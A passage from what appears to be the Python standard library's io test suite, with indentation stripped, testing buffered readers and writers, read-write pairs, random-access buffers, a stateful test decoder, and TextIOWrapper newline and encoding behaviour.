self.assertTrue(flushed.startswith(contents[:-8]), flushed)
def check_writes(self, intermediate_func):
contents = bytes(range(256)) * 1000
n = 0
writer = self.MockRawIO()
bufio = self.tp(writer, 13)
def gen_sizes():
for size in count(1):
for i in range(15):
yield size
sizes = gen_sizes()
while n < len(contents):
size = min(next(sizes), len(contents) - n)
self.assertEqual(bufio.write(contents[n:n + size]), size)
intermediate_func(bufio)
n += size
bufio.flush()
self.assertEqual(contents, b''.join(writer._write_stack))
def test_writes(self):
self.check_writes(lambda bufio: None)
def test_writes_and_flushes(self):
self.check_writes(lambda bufio: bufio.flush())
def test_writes_and_seeks(self):
def _seekabs(bufio):
pos = bufio.tell()
bufio.seek(pos + 1, 0)
bufio.seek(pos - 1, 0)
bufio.seek(pos, 0)
self.check_writes(_seekabs)
def _seekrel(bufio):
pos = bufio.seek(0, 1)
bufio.seek(+1, 1)
bufio.seek(-1, 1)
bufio.seek(pos, 0)
self.check_writes(_seekrel)
def test_writes_and_truncates(self):
self.check_writes(lambda bufio: bufio.truncate(bufio.tell()))
def test_write_non_blocking(self):
raw = self.MockNonBlockWriterIO()
bufio = self.tp(raw, 8)
self.assertEqual(bufio.write(b'abcd'), 4)
self.assertEqual(bufio.write(b'efghi'), 5)
raw.block_on(b'k')
self.assertEqual(bufio.write(b'jklmn'), 5)
raw.block_on(b'0')
try:
bufio.write(b'opqrwxyz0123456789')
except self.BlockingIOError as e:
written = e.characters_written
else:
self.fail('BlockingIOError should have been raised')
self.assertEqual(written, 16)
self.assertEqual(raw.pop_written(), b'abcdefghijklmnopqrwxyz')
self.assertEqual(bufio.write(b'ABCDEFGHI'), 9)
s = raw.pop_written()
self.assertTrue(s.startswith(b'01234567A'), s)
def test_write_and_rewind(self):
raw = io.BytesIO()
bufio = self.tp(raw, 4)
self.assertEqual(bufio.write(b'abcdef'), 6)
self.assertEqual(bufio.tell(), 6)
bufio.seek(0, 0)
self.assertEqual(bufio.write(b'XY'), 2)
bufio.seek(6, 0)
self.assertEqual(raw.getvalue(), b'XYcdef')
self.assertEqual(bufio.write(b'123456'), 6)
bufio.flush()
self.assertEqual(raw.getvalue(), b'XYcdef123456')
def test_flush(self):
writer = self.MockRawIO()
bufio = self.tp(writer, 8)
bufio.write(b'abc')
bufio.flush()
self.assertEqual(b'abc', writer._write_stack[0])
def test_writelines(self):
l = [b'ab', b'cd', b'ef']
writer = self.MockRawIO()
bufio = self.tp(writer, 8)
bufio.writelines(l)
bufio.flush()
self.assertEqual(b''.join(writer._write_stack), b'abcdef')
def test_writelines_userlist(self):
l = UserList([b'ab', b'cd', b'ef'])
writer = self.MockRawIO()
bufio = self.tp(writer, 8)
bufio.writelines(l)
bufio.flush()
self.assertEqual(b''.join(writer._write_stack), b'abcdef')
def test_writelines_error(self):
writer = self.MockRawIO()
bufio = self.tp(writer, 8)
self.assertRaises(TypeError, bufio.writelines, [1, 2, 3])
self.assertRaises(TypeError, bufio.writelines, None)
self.assertRaises(TypeError, bufio.writelines, 'abc')
def test_destructor(self):
writer = self.MockRawIO()
bufio = self.tp(writer, 8)
bufio.write(b'abc')
del bufio
support.gc_collect()
self.assertEqual(b'abc', writer._write_stack[0])
def test_truncate(self):
with self.open(support.TESTFN, self.write_mode, buffering=0) as raw:
bufio = self.tp(raw, 8)
bufio.write(b'abcdef')
self.assertEqual(bufio.truncate(3), 3)
self.assertEqual(bufio.tell(), 6)
with self.open(support.TESTFN, 'rb', buffering=0) as f:
self.assertEqual(f.read(), b'abc')
@unittest.skipUnless(threading, 'Threading required for this test.')
@support.requires_resource('cpu')
def test_threads(self):
try:
N = 1000
contents = bytes(range(256)) * N
sizes = cycle([1, 19])
n = 0
queue = deque()
while n < len(contents):
size = next(sizes)
queue.append(contents[n:n + size])
n += size
del contents
with self.open(support.TESTFN, self.write_mode, buffering=0
) as raw:
bufio = self.tp(raw, 8)
errors = []
def f():
try:
while True:
try:
s = queue.popleft()
except IndexError:
return
bufio.write(s)
except Exception as e:
errors.append(e)
raise
threads = [threading.Thread(target=f) for x in range(20)]
with support.start_threads(threads):
time.sleep(0.02)
self.assertFalse(errors,
'the following exceptions were caught: %r' % errors)
bufio.close()
with self.open(support.TESTFN, 'rb') as f:
s = f.read()
for i in range(256):
self.assertEqual(s.count(bytes([i])), N)
finally:
support.unlink(support.TESTFN)
def test_misbehaved_io(self):
rawio = self.MisbehavedRawIO()
bufio = self.tp(rawio, 5)
self.assertRaises(OSError, bufio.seek, 0)
self.assertRaises(OSError, bufio.tell)
self.assertRaises(OSError, bufio.write, b'abcdef')
def test_max_buffer_size_removal(self):
with self.assertRaises(TypeError):
self.tp(self.MockRawIO(), 8, 12)
def test_write_error_on_close(self):
raw = self.MockRawIO()
def bad_write(b):
raise OSError()
raw.write = bad_write
b = self.tp(raw)
b.write(b'spam')
self.assertRaises(OSError, b.close)
self.assertTrue(b.closed)
class CBufferedWriterTest(BufferedWriterTest, SizeofTest):
tp = io.BufferedWriter
def test_constructor(self):
BufferedWriterTest.test_constructor(self)
if sys.maxsize > 2147483647:
rawio = self.MockRawIO()
bufio = self.tp(rawio)
self.assertRaises((OverflowError, MemoryError, ValueError),
bufio.__init__, rawio, sys.maxsize)
def test_initialization(self):
rawio = self.MockRawIO()
bufio = self.tp(rawio)
self.assertRaises(ValueError, bufio.__init__, rawio, buffer_size=0)
self.assertRaises(ValueError, bufio.write, b'def')
self.assertRaises(ValueError, bufio.__init__, rawio, buffer_size=-16)
self.assertRaises(ValueError, bufio.write, b'def')
self.assertRaises(ValueError, bufio.__init__, rawio, buffer_size=-1)
self.assertRaises(ValueError, bufio.write, b'def')
def test_garbage_collection(self):
with support.check_warnings(('', ResourceWarning)):
rawio = self.FileIO(support.TESTFN, 'w+b')
f = self.tp(rawio)
f.write(b'123xxx')
f.x = f
wr = weakref.ref(f)
del f
support.gc_collect()
self.assertIsNone(wr(), wr)
with self.open(support.TESTFN, 'rb') as f:
self.assertEqual(f.read(), b'123xxx')
def test_args_error(self):
with self.assertRaisesRegex(TypeError, 'BufferedWriter'):
self.tp(io.BytesIO(), 1024, 1024, 1024)
class PyBufferedWriterTest(BufferedWriterTest):
tp = pyio.BufferedWriter
class BufferedRWPairTest(unittest.TestCase):
def test_constructor(self):
pair = self.tp(self.MockRawIO(), self.MockRawIO())
self.assertFalse(pair.closed)
def test_uninitialized(self):
pair = self.tp.__new__(self.tp)
del pair
pair = self.tp.__new__(self.tp)
self.assertRaisesRegex((ValueError, AttributeError),
'uninitialized|has no attribute', pair.read, 0)
self.assertRaisesRegex((ValueError, AttributeError),
'uninitialized|has no attribute', pair.write, b'')
pair.__init__(self.MockRawIO(), self.MockRawIO())
self.assertEqual(pair.read(0), b'')
self.assertEqual(pair.write(b''), 0)
def test_detach(self):
pair = self.tp(self.MockRawIO(), self.MockRawIO())
self.assertRaises(self.UnsupportedOperation, pair.detach)
def test_constructor_max_buffer_size_removal(self):
with self.assertRaises(TypeError):
self.tp(self.MockRawIO(), self.MockRawIO(), 8, 12)
def test_constructor_with_not_readable(self):
class NotReadable(MockRawIO):
def readable(self):
return False
self.assertRaises(OSError, self.tp, NotReadable(), self.MockRawIO())
def test_constructor_with_not_writeable(self):
class NotWriteable(MockRawIO):
def writable(self):
return False
self.assertRaises(OSError, self.tp, self.MockRawIO(), NotWriteable())
def test_read(self):
pair = self.tp(self.BytesIO(b'abcdef'), self.MockRawIO())
self.assertEqual(pair.read(3), b'abc')
self.assertEqual(pair.read(1), b'd')
self.assertEqual(pair.read(), b'ef')
pair = self.tp(self.BytesIO(b'abc'), self.MockRawIO())
self.assertEqual(pair.read(None), b'abc')
def test_readlines(self):
pair = lambda : self.tp(self.BytesIO(b'abc\ndef\nh'), self.MockRawIO())
self.assertEqual(pair().readlines(), [b'abc\n', b'def\n', b'h'])
self.assertEqual(pair().readlines(), [b'abc\n', b'def\n', b'h'])
self.assertEqual(pair().readlines(5), [b'abc\n', b'def\n'])
def test_read1(self):
pair = self.tp(self.BytesIO(b'abcdef'), self.MockRawIO())
self.assertEqual(pair.read1(3), b'abc')
def test_readinto(self):
for method in ('readinto', 'readinto1'):
with self.subTest(method):
pair = self.tp(self.BytesIO(b'abcdef'), self.MockRawIO())
data = byteslike(b'\x00' * 5)
self.assertEqual(getattr(pair, method)(data), 5)
self.assertEqual(bytes(data), b'abcde')
def test_write(self):
w = self.MockRawIO()
pair = self.tp(self.MockRawIO(), w)
pair.write(b'abc')
pair.flush()
buffer = bytearray(b'def')
pair.write(buffer)
buffer[:] = b'***'
pair.flush()
self.assertEqual(w._write_stack, [b'abc', b'def'])
def test_peek(self):
pair = self.tp(self.BytesIO(b'abcdef'), self.MockRawIO())
self.assertTrue(pair.peek(3).startswith(b'abc'))
self.assertEqual(pair.read(3), b'abc')
def test_readable(self):
pair = self.tp(self.MockRawIO(), self.MockRawIO())
self.assertTrue(pair.readable())
def test_writeable(self):
pair = self.tp(self.MockRawIO(), self.MockRawIO())
self.assertTrue(pair.writable())
def test_seekable(self):
pair = self.tp(self.MockRawIO(), self.MockRawIO())
self.assertFalse(pair.seekable())
def test_close_and_closed(self):
pair = self.tp(self.MockRawIO(), self.MockRawIO())
self.assertFalse(pair.closed)
pair.close()
self.assertTrue(pair.closed)
def test_reader_close_error_on_close(self):
def reader_close():
reader_non_existing
reader = self.MockRawIO()
reader.close = reader_close
writer = self.MockRawIO()
pair = self.tp(reader, writer)
with self.assertRaises(NameError) as err:
pair.close()
self.assertIn('reader_non_existing', str(err.exception))
self.assertTrue(pair.closed)
self.assertFalse(reader.closed)
self.assertTrue(writer.closed)
def test_writer_close_error_on_close(self):
def writer_close():
writer_non_existing
reader = self.MockRawIO()
writer = self.MockRawIO()
writer.close = writer_close
pair = self.tp(reader, writer)
with self.assertRaises(NameError) as err:
pair.close()
self.assertIn('writer_non_existing', str(err.exception))
self.assertFalse(pair.closed)
self.assertTrue(reader.closed)
self.assertFalse(writer.closed)
def test_reader_writer_close_error_on_close(self):
def reader_close():
reader_non_existing
def writer_close():
writer_non_existing
reader = self.MockRawIO()
reader.close = reader_close
writer = self.MockRawIO()
writer.close = writer_close
pair = self.tp(reader, writer)
with self.assertRaises(NameError) as err:
pair.close()
self.assertIn('reader_non_existing', str(err.exception))
self.assertIsInstance(err.exception.__context__, NameError)
self.assertIn('writer_non_existing', str(err.exception.__context__))
self.assertFalse(pair.closed)
self.assertFalse(reader.closed)
self.assertFalse(writer.closed)
def test_isatty(self):
class SelectableIsAtty(MockRawIO):
def __init__(self, isatty):
MockRawIO.__init__(self)
self._isatty = isatty
def isatty(self):
return self._isatty
pair = self.tp(SelectableIsAtty(False), SelectableIsAtty(False))
self.assertFalse(pair.isatty())
pair = self.tp(SelectableIsAtty(True), SelectableIsAtty(False))
self.assertTrue(pair.isatty())
pair = self.tp(SelectableIsAtty(False), SelectableIsAtty(True))
self.assertTrue(pair.isatty())
pair = self.tp(SelectableIsAtty(True), SelectableIsAtty(True))
self.assertTrue(pair.isatty())
def test_weakref_clearing(self):
brw = self.tp(self.MockRawIO(), self.MockRawIO())
ref = weakref.ref(brw)
brw = None
ref = None
class CBufferedRWPairTest(BufferedRWPairTest):
tp = io.BufferedRWPair
class PyBufferedRWPairTest(BufferedRWPairTest):
tp = pyio.BufferedRWPair
class BufferedRandomTest(BufferedReaderTest, BufferedWriterTest):
read_mode = 'rb+'
write_mode = 'wb+'
def test_constructor(self):
BufferedReaderTest.test_constructor(self)
BufferedWriterTest.test_constructor(self)
def test_uninitialized(self):
BufferedReaderTest.test_uninitialized(self)
BufferedWriterTest.test_uninitialized(self)
def test_read_and_write(self):
raw = self.MockRawIO((b'asdf', b'ghjk'))
rw = self.tp(raw, 8)
self.assertEqual(b'as', rw.read(2))
rw.write(b'ddd')
rw.write(b'eee')
self.assertFalse(raw._write_stack)
self.assertEqual(b'ghjk', rw.read())
self.assertEqual(b'dddeee', raw._write_stack[0])
def test_seek_and_tell(self):
raw = self.BytesIO(b'asdfghjkl')
rw = self.tp(raw)
self.assertEqual(b'as', rw.read(2))
self.assertEqual(2, rw.tell())
rw.seek(0, 0)
self.assertEqual(b'asdf', rw.read(4))
rw.write(b'123f')
rw.seek(0, 0)
self.assertEqual(b'asdf123fl', rw.read())
self.assertEqual(9, rw.tell())
rw.seek(-4, 2)
self.assertEqual(5, rw.tell())
rw.seek(2, 1)
self.assertEqual(7, rw.tell())
self.assertEqual(b'fl', rw.read(11))
rw.flush()
self.assertEqual(b'asdf123fl', raw.getvalue())
self.assertRaises(TypeError, rw.seek, 0.0)
def check_flush_and_read(self, read_func):
raw = self.BytesIO(b'abcdefghi')
bufio = self.tp(raw)
self.assertEqual(b'ab', read_func(bufio, 2))
bufio.write(b'12')
self.assertEqual(b'ef', read_func(bufio, 2))
self.assertEqual(6, bufio.tell())
bufio.flush()
self.assertEqual(6, bufio.tell())
self.assertEqual(b'ghi', read_func(bufio))
raw.seek(0, 0)
raw.write(b'XYZ')
bufio.flush()
bufio.seek(0, 0)
self.assertEqual(b'XYZ', read_func(bufio, 3))
def test_flush_and_read(self):
self.check_flush_and_read(lambda bufio, *args: bufio.read(*args))
def test_flush_and_readinto(self):
def _readinto(bufio, n=-1):
b = bytearray(n if n >= 0 else 9999)
n = bufio.readinto(b)
return bytes(b[:n])
self.check_flush_and_read(_readinto)
def test_flush_and_peek(self):
def _peek(bufio, n=-1):
b = bufio.peek(n)
if n != -1:
b = b[:n]
bufio.seek(len(b), 1)
return b
self.check_flush_and_read(_peek)
def test_flush_and_write(self):
raw = self.BytesIO(b'abcdefghi')
bufio = self.tp(raw)
bufio.write(b'123')
bufio.flush()
bufio.write(b'45')
bufio.flush()
bufio.seek(0, 0)
self.assertEqual(b'12345fghi', raw.getvalue())
self.assertEqual(b'12345fghi', bufio.read())
def test_threads(self):
BufferedReaderTest.test_threads(self)
BufferedWriterTest.test_threads(self)
def test_writes_and_peek(self):
def _peek(bufio):
bufio.peek(1)
self.check_writes(_peek)
def _peek(bufio):
pos = bufio.tell()
bufio.seek(-1, 1)
bufio.peek(1)
bufio.seek(pos, 0)
self.check_writes(_peek)
def test_writes_and_reads(self):
def _read(bufio):
bufio.seek(-1, 1)
bufio.read(1)
self.check_writes(_read)
def test_writes_and_read1s(self):
def _read1(bufio):
bufio.seek(-1, 1)
bufio.read1(1)
self.check_writes(_read1)
def test_writes_and_readintos(self):
def _read(bufio):
bufio.seek(-1, 1)
bufio.readinto(bytearray(1))
self.check_writes(_read)
def test_write_after_readahead(self):
for overwrite_size in [1, 5]:
raw = self.BytesIO(b'A' * 10)
bufio = self.tp(raw, 4)
self.assertEqual(bufio.read(1), b'A')
self.assertEqual(bufio.tell(), 1)
bufio.write(b'B' * overwrite_size)
self.assertEqual(bufio.tell(), overwrite_size + 1)
bufio.flush()
self.assertEqual(bufio.tell(), overwrite_size + 1)
s = raw.getvalue()
self.assertEqual(s, b'A' + b'B' * overwrite_size + b'A' * (9 -
overwrite_size))
def test_write_rewind_write(self):
def mutate(bufio, pos1, pos2):
assert pos2 >= pos1
bufio.seek(pos1)
bufio.read(pos2 - pos1)
bufio.write(b'\x02')
bufio.seek(pos1)
bufio.write(b'\x01')
b = b'\x80\x81\x82\x83\x84'
for i in range(0, len(b)):
for j in range(i, len(b)):
raw = self.BytesIO(b)
bufio = self.tp(raw, 100)
mutate(bufio, i, j)
bufio.flush()
expected = bytearray(b)
expected[j] = 2
expected[i] = 1
self.assertEqual(raw.getvalue(), expected,
'failed result for i=%d, j=%d' % (i, j))
def test_truncate_after_read_or_write(self):
raw = self.BytesIO(b'A' * 10)
bufio = self.tp(raw, 100)
self.assertEqual(bufio.read(2), b'AA')
self.assertEqual(bufio.truncate(), 2)
self.assertEqual(bufio.write(b'BB'), 2)
self.assertEqual(bufio.truncate(), 4)
def test_misbehaved_io(self):
BufferedReaderTest.test_misbehaved_io(self)
BufferedWriterTest.test_misbehaved_io(self)
def test_interleaved_read_write(self):
with self.BytesIO(b'abcdefgh') as raw:
with self.tp(raw, 100) as f:
f.write(b'1')
self.assertEqual(f.read(1), b'b')
f.write(b'2')
self.assertEqual(f.read1(1), b'd')
f.write(b'3')
buf = bytearray(1)
f.readinto(buf)
self.assertEqual(buf, b'f')
f.write(b'4')
self.assertEqual(f.peek(1), b'h')
f.flush()
self.assertEqual(raw.getvalue(), b'1b2d3f4h')
with self.BytesIO(b'abc') as raw:
with self.tp(raw, 100) as f:
self.assertEqual(f.read(1), b'a')
f.write(b'2')
self.assertEqual(f.read(1), b'c')
f.flush()
self.assertEqual(raw.getvalue(), b'a2c')
def test_interleaved_readline_write(self):
with self.BytesIO(b'ab\ncdef\ng\n') as raw:
with self.tp(raw) as f:
f.write(b'1')
self.assertEqual(f.readline(), b'b\n')
f.write(b'2')
self.assertEqual(f.readline(), b'def\n')
f.write(b'3')
self.assertEqual(f.readline(), b'\n')
f.flush()
self.assertEqual(raw.getvalue(), b'1b\n2def\n3\n')
test_unseekable = None
class CBufferedRandomTest(BufferedRandomTest, SizeofTest):
tp = io.BufferedRandom
def test_constructor(self):
BufferedRandomTest.test_constructor(self)
if sys.maxsize > 2147483647:
rawio = self.MockRawIO()
bufio = self.tp(rawio)
self.assertRaises((OverflowError, MemoryError, ValueError),
bufio.__init__, rawio, sys.maxsize)
def test_garbage_collection(self):
CBufferedReaderTest.test_garbage_collection(self)
CBufferedWriterTest.test_garbage_collection(self)
def test_args_error(self):
with self.assertRaisesRegex(TypeError, 'BufferedRandom'):
self.tp(io.BytesIO(), 1024, 1024, 1024)
class PyBufferedRandomTest(BufferedRandomTest):
tp = pyio.BufferedRandom
class StatefulIncrementalDecoder(codecs.IncrementalDecoder):
"""
For testing seek/tell behavior with a stateful, buffering decoder.
Input is a sequence of words. Words may be fixed-length (length set
by input) or variable-length (period-terminated). In variable-length
mode, extra periods are ignored. Possible words are:
- 'i' followed by a number sets the input length, I (maximum 99).
When I is set to 0, words are space-terminated.
- 'o' followed by a number sets the output length, O (maximum 99).
- Any other word is converted into a word followed by a period on
the output. The output word consists of the input word truncated
or padded out with hyphens to make its length equal to O. If O
is 0, the word is output verbatim without truncating or padding.
I and O are initially set to 1. When I changes, any buffered input is
re-scanned according to the new I. EOF also terminates the last word.
"""
def __init__(self, errors='strict'):
codecs.IncrementalDecoder.__init__(self, errors)
self.reset()
def __repr__(self):
return '<SID %x>' % id(self)
def reset(self):
self.i = 1
self.o = 1
self.buffer = bytearray()
def getstate(self):
i, o = self.i ^ 1, self.o ^ 1
return bytes(self.buffer), i * 100 + o
def setstate(self, state):
buffer, io = state
self.buffer = bytearray(buffer)
i, o = divmod(io, 100)
self.i, self.o = i ^ 1, o ^ 1
def decode(self, input, final=False):
output = ''
for b in input:
if self.i == 0:
if b == ord('.'):
if self.buffer:
output += self.process_word()
else:
self.buffer.append(b)
else:
self.buffer.append(b)
if len(self.buffer) == self.i:
output += self.process_word()
if final and self.buffer:
output += self.process_word()
return output
def process_word(self):
output = ''
if self.buffer[0] == ord('i'):
self.i = min(99, int(self.buffer[1:] or 0))
elif self.buffer[0] == ord('o'):
self.o = min(99, int(self.buffer[1:] or 0))
else:
output = self.buffer.decode('ascii')
if len(output) < self.o:
output += '-' * self.o
if self.o:
output = output[:self.o]
output += '.'
self.buffer = bytearray()
return output
codecEnabled = False
@classmethod
def lookupTestDecoder(cls, name):
if cls.codecEnabled and name == 'test_decoder':
latin1 = codecs.lookup('latin-1')
return codecs.CodecInfo(name='test_decoder', encode=latin1.
encode, decode=None, incrementalencoder=None, streamreader=
None, streamwriter=None, incrementaldecoder=cls)
codecs.register(StatefulIncrementalDecoder.lookupTestDecoder)
class StatefulIncrementalDecoderTest(unittest.TestCase):
"""
Make sure the StatefulIncrementalDecoder actually works.
"""
test_cases = [(b'abcd', False, 'a.b.c.d.'), (b'oiabcd', True, 'abcd.'),
(b'oi...abcd...', True, 'abcd.'), (b'i.o6.x.xyz.toolongtofit.',
False, 'x-----.xyz---.toolon.'), (b'i.i2.o6xyz', True,
'xy----.z-----.'), (b'i.o3.i6.abcdefghijklmnop', True,
'abc.ghi.mno.'), (
b'i.o29.a.b.cde.o15.abcdefghijabcdefghij.i3.a.b.c.d.ei00k.l.m',
True, 'a----------------------------.' +
'b----------------------------.' + 'cde--------------------------.' +
'abcdefghijabcde.' + 'a.b------------.' + '.c.------------.' +
'd.e------------.' + 'k--------------.' + 'l--------------.' +
'm--------------.')]
def test_decoder(self):
for input, eof, output in self.test_cases:
d = StatefulIncrementalDecoder()
self.assertEqual(d.decode(input, eof), output)
d = StatefulIncrementalDecoder()
self.assertEqual(d.decode(b'oiabcd'), '')
self.assertEqual(d.decode(b'', 1), 'abcd.')
class TextIOWrapperTest(unittest.TestCase):
def setUp(self):
self.testdata = b'AAA\r\nBBB\rCCC\r\nDDD\nEEE\r\n'
self.normalized = b'AAA\nBBB\nCCC\nDDD\nEEE\n'.decode('ascii')
support.unlink(support.TESTFN)
def tearDown(self):
support.unlink(support.TESTFN)
def test_constructor(self):
r = self.BytesIO(b'\xc3\xa9\n\n')
b = self.BufferedReader(r, 1000)
t = self.TextIOWrapper(b)
t.__init__(b, encoding='latin-1', newline='\r\n')
self.assertEqual(t.encoding, 'latin-1')
self.assertEqual(t.line_buffering, False)
t.__init__(b, encoding='utf-8', line_buffering=True)
self.assertEqual(t.encoding, 'utf-8')
self.assertEqual(t.line_buffering, True)
self.assertEqual('é\n', t.readline())
self.assertRaises(TypeError, t.__init__, b, newline=42)
self.assertRaises(ValueError, t.__init__, b, newline='xyzzy')
def test_uninitialized(self):
t = self.TextIOWrapper.__new__(self.TextIOWrapper)
del t
t = self.TextIOWrapper.__new__(self.TextIOWrapper)
self.assertRaises(Exception, repr, t)
self.assertRaisesRegex((ValueError, AttributeError),
'uninitialized|has no attribute', t.read, 0)
t.__init__(self.MockRawIO())
self.assertEqual(t.read(0), '')
def test_non_text_encoding_codecs_are_rejected(self):
r = self.BytesIO()
b = self.BufferedWriter(r)
with self.assertRaisesRegex(LookupError, 'is not a text encoding'):
self.TextIOWrapper(b, encoding='hex')
def test_detach(self):
r = self.BytesIO()
b = self.BufferedWriter(r)
t = self.TextIOWrapper(b)
self.assertIs(t.detach(), b)
t = self.TextIOWrapper(b, encoding='ascii')
t.write('howdy')
self.assertFalse(r.getvalue())
t.detach()
self.assertEqual(r.getvalue(), b'howdy')
self.assertRaises(ValueError, t.detach)
repr(t)
self.assertEqual(t.encoding, 'ascii')
self.assertEqual(t.errors, 'strict')
self.assertFalse(t.line_buffering)
def test_repr(self):
raw = self.BytesIO('hello'.encode('utf-8'))
b = self.BufferedReader(raw)
t = self.TextIOWrapper(b, encoding='utf-8')
modname = self.TextIOWrapper.__module__
self.assertEqual(repr(t), "<%s.TextIOWrapper encoding='utf-8'>" %
modname)
raw.name = 'dummy'
self.assertEqual(repr(t),
"<%s.TextIOWrapper name='dummy' encoding='utf-8'>" % modname)
t.mode = 'r'
self.assertEqual(repr(t),
"<%s.TextIOWrapper name='dummy' mode='r' encoding='utf-8'>" %
modname)
raw.name = b'dummy'
self.assertEqual(repr(t),
"<%s.TextIOWrapper name=b'dummy' mode='r' encoding='utf-8'>" %
modname)
t.buffer.detach()
repr(t)
def test_recursive_repr(self):
raw = self.BytesIO()
t = self.TextIOWrapper(raw)
with support.swap_attr(raw, 'name', t):
try:
repr(t)
except RuntimeError:
pass
def test_line_buffering(self):
r = self.BytesIO()
b = self.BufferedWriter(r, 1000)
t = self.TextIOWrapper(b, newline='\n', line_buffering=True)
t.write('X')
self.assertEqual(r.getvalue(), b'')
t.write('Y\nZ')
self.assertEqual(r.getvalue(), b'XY\nZ')
t.write('A\rB')
self.assertEqual(r.getvalue(), b'XY\nZA\rB')
def test_default_encoding(self):
old_environ = dict(os.environ)
try:
for key in ('LC_ALL', 'LANG', 'LC_CTYPE'):
if key in os.environ:
del os.environ[key]
current_locale_encoding = locale.getpreferredencoding(False)
b = self.BytesIO()
t = self.TextIOWrapper(b)
self.assertEqual(t.encoding, current_locale_encoding)
finally:
os.environ.clear()
os.environ.update(old_environ)
@support.cpython_only
def test_device_encoding(self):
import _testcapi
b = self.BytesIO()
b.fileno = lambda : _testcapi.INT_MAX + 1
self.assertRaises(OverflowError, self.TextIOWrapper, b)
b.fileno = lambda : _testcapi.UINT_MAX + 1
self.assertRaises(OverflowError, self.TextIOWrapper, b)
def test_encoding(self):
b = self.BytesIO()
t = self.TextIOWrapper(b, encoding='utf-8')
self.assertEqual(t.encoding, 'utf-8')
t = self.TextIOWrapper(b)
self.assertIsNotNone(t.encoding)
codecs.lookup(t.encoding)
def test_encoding_errors_reading(self):
b = self.BytesIO(b'abc\n\xff\n')
t = self.TextIOWrapper(b, encoding='ascii')
self.assertRaises(UnicodeError, t.read)
b = self.BytesIO(b'abc\n\xff\n')
t = self.TextIOWrapper(b, encoding='ascii', errors='strict')
self.assertRaises(UnicodeError, t.read)
b = self.BytesIO(b'abc\n\xff\n')
t = self.TextIOWrapper(b, encoding='ascii', errors='ignore')
self.assertEqual(t.read(), 'abc\n\n')
b = self.BytesIO(b'abc\n\xff\n')
t = self.TextIOWrapper(b, encoding='ascii', errors='replace')
self.assertEqual(t.read(), 'abc\n�\n')
def test_encoding_errors_writing(self):
b = self.BytesIO()
t = self.TextIOWrapper(b, encoding='ascii')
self.assertRaises(UnicodeError, t.write, 'ÿ')
b = self.BytesIO()
t = self.TextIOWrapper(b, encoding='ascii', errors='strict')
self.assertRaises(UnicodeError, t.write, 'ÿ')
b = self.BytesIO()
t = self.TextIOWrapper(b, encoding='ascii', errors='ignore',
newline='\n')
t.write('abcÿdef\n')
t.flush()
self.assertEqual(b.getvalue(), b'abcdef\n')
b = self.BytesIO()
t = self.TextIOWrapper(b, encoding='ascii', errors='replace',
newline='\n')
t.write('abcÿdef\n')
t.flush()
self.assertEqual(b.getvalue(), b'abc?def\n')
def test_newlines(self):
input_lines = ['unix\n', 'windows\r\n', 'os9\r', 'last\n', 'nonl']
tests = [[None, ['unix\n', 'windows\n', 'os9\n', 'last\n', 'nonl']],
['', input_lines], ['\n', ['unix\n', 'windows\r\n',
'os9\rlast\n', 'nonl']], ['\r\n', ['unix\nwindows\r\n',
'os9\rlast\nnonl']], ['\r', ['unix\nwindows\r', '\nos9\r',
'last\nnonl']]]
encodings = ('utf-8', 'latin-1', 'utf-16', 'utf-16-le', 'utf-16-be',
'utf-32', 'utf-32-le', 'utf-32-be')
for encoding in encodings:
data = bytes(''.join(input_lines).encode(encoding))
for do_reads in (False, True):
for bufsize in range(1, 10):
for newline, exp_lines in tests:
bufio = self.BufferedReader(self.BytesIO(data), bufsize
)
textio = self.TextIOWrapper(bufio, newline=newline,
encoding=encoding)
if do_reads:
got_lines = []
while True:
c2 = textio.read(2)
if c2 == '':
break
self.assertEqual(len(c2), 2)
got_lines.append(c2 + textio.readline())
else:
got_lines = list(textio)
for got_line, exp_line in zip(got_lines, exp_lines):
self.assertEqual(got_line, exp_line)
self.assertEqual(len(got_lines), len(exp_lines))
def test_newlines_input(self):
testdata = b'AAA\nBB\x00B\nCCC\rDDD\rEEE\r\nFFF\r\nGGG'
normalized = testdata.replace(b'\r\n', b'\n').replace(b'\r', b'\n')
for newline, expected in [(None, normalized.decode('ascii').
splitlines(keepends=True)), ('', testdata.decode('ascii').
splitlines(keepends=True)), ('\n', ['AAA\n', 'BB\x00B\n',
'CCC\rDDD\rEEE\r\n', 'FFF\r\n', 'GGG']), ('\r\n', [
'AAA\nBB\x00B\nCCC\rDDD\rEEE\r\n', 'FFF\r\n', 'GGG']), ('\r', [
'AAA\nBB\x00B\nCCC\r', 'DDD\r', 'EEE\r', '\nFFF\r', '\nGGG'])]:
buf = self.BytesIO(testdata)
txt = self.TextIOWrapper(buf, encoding='ascii', newline=newline)
self.assertEqual(txt.readlines(), expected)
txt.seek(0)
self.assertEqual(txt.read(), ''.join(expected))
def test_newlines_output(self):
testdict = {'': b'AAA\nBBB\nCCC\nX\rY\r\nZ', '\n':
b'AAA\nBBB\nCCC\nX\rY\r\nZ', '\r': b'AAA\rBBB\rCCC\rX\rY\r\rZ',
'\r\n': b'AAA\r\nBBB\r\nCCC\r\nX\rY\r\r\nZ'}
tests = [(None, testdict[os.linesep])] + sorted(testdict.items())
for newline, expected in tests:
buf = self.BytesIO()
txt = self.TextIOWrapper(buf, encoding='ascii', newline=newline)
txt.write('AAA\nB')
txt.write('BB\nCCC\n')
txt.write('X\rY\r\nZ')
txt.flush()
self.assertEqual(buf.closed, False)
self.assertEqual(buf.getvalue(), expected)
def test_destructor(self):
l = []
base = self.BytesIO
class MyBytesIO(base):
def close(self):
l.append(self.getvalue())
base.close(self)
b = MyBytesIO()
t = self.TextIOWrapper(b, encoding='ascii')
t.write('abc')
del t
support.gc_collect()
self.assertEqual([b'abc'], l)
def test_override_destructor(self):
record = []
class MyTextIO(self.TextIOWrapper):
def __del__(self):
record.append(1)
try:
f = super().__del__
except AttributeError:
pass
else:
f()
def close(self):
record.append(2)
super().close()
def flush(self):
record.append(3)
super().flush()
b = self.BytesIO()
t = MyTextIO(b, encoding='ascii')
del t
support.gc_collect()
self.assertEqual(record, [1, 2, 3])
def test_error_through_destructor(self):
rawio = self.CloseFailureIO()
def f():
self.TextIOWrapper(rawio).xyzzy
with support.captured_output('stderr') as s:
self.assertRaises(AttributeError, f)
s = s.getvalue().strip()
if s:
self.assertEqual(len(s.splitlines()), 1)
self.assertTrue(s.startswith('Exception OSError: '), s)
self.assertTrue(s.endswith(' ignored'), s)
def test_basic_io(self):
for chunksize in (1, 2, 3, 4, 5, 15, 16, 17, 31, 32, 33, 63, 64, 65):
for enc in ('ascii', 'latin-1', 'utf-8'):
f = self.open(support.TESTFN, 'w+', encoding=enc)
